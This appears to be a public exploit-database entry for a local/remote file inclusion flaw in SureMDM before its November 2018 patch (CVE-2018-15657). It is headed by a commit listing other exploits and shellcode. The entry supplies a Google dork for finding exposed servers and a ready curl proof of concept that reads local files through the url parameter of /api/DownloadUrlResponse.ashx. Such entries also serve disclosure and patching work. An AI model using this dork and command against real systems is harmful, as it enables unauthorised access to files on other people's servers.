
4 changes to exploits/shellcodes Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC) PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit SureMDM < 2018-11 Patch - Local / Remote File Inclusion Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)
13 lines
No EOL
846 B
Text
13 lines
No EOL
846 B
Text
# Exploit Title: SureMDM LFI/RFI (Prior to 2018-11 Patch)
|
|
# Google Dork: inurl:/api/DownloadUrlResponse.ashx
|
|
# Date: 2019-02-01
|
|
# Exploit Author: Digital Interruption
|
|
# Vendor Homepage: https://www.42gears.com/
|
|
# Software Link: https://www.42gears.com/products/suremdm-home/
|
|
# Version: Versions prior to the November 2018 patch
|
|
# Tested on: Windows
|
|
# CVE : CVE-2018-15657
|
|
|
|
An attacker can force the web server to request remote files and display the output by placing any arbitrary URL in the "url" parameter of /api/DownloadUrlResponse.ashx. This can also be utilised to request files from the local file system by using the file:// URI syntax, such as file://C:/WINDOWS/System32/drivers/etc/hosts
|
|
|
|
Proof of concept: curl -H "ApiKey: apiKey" http://target/api/DownloadUrlResponse.ashx?url=file://C:/WINDOWS/System32/drivers/etc/hosts |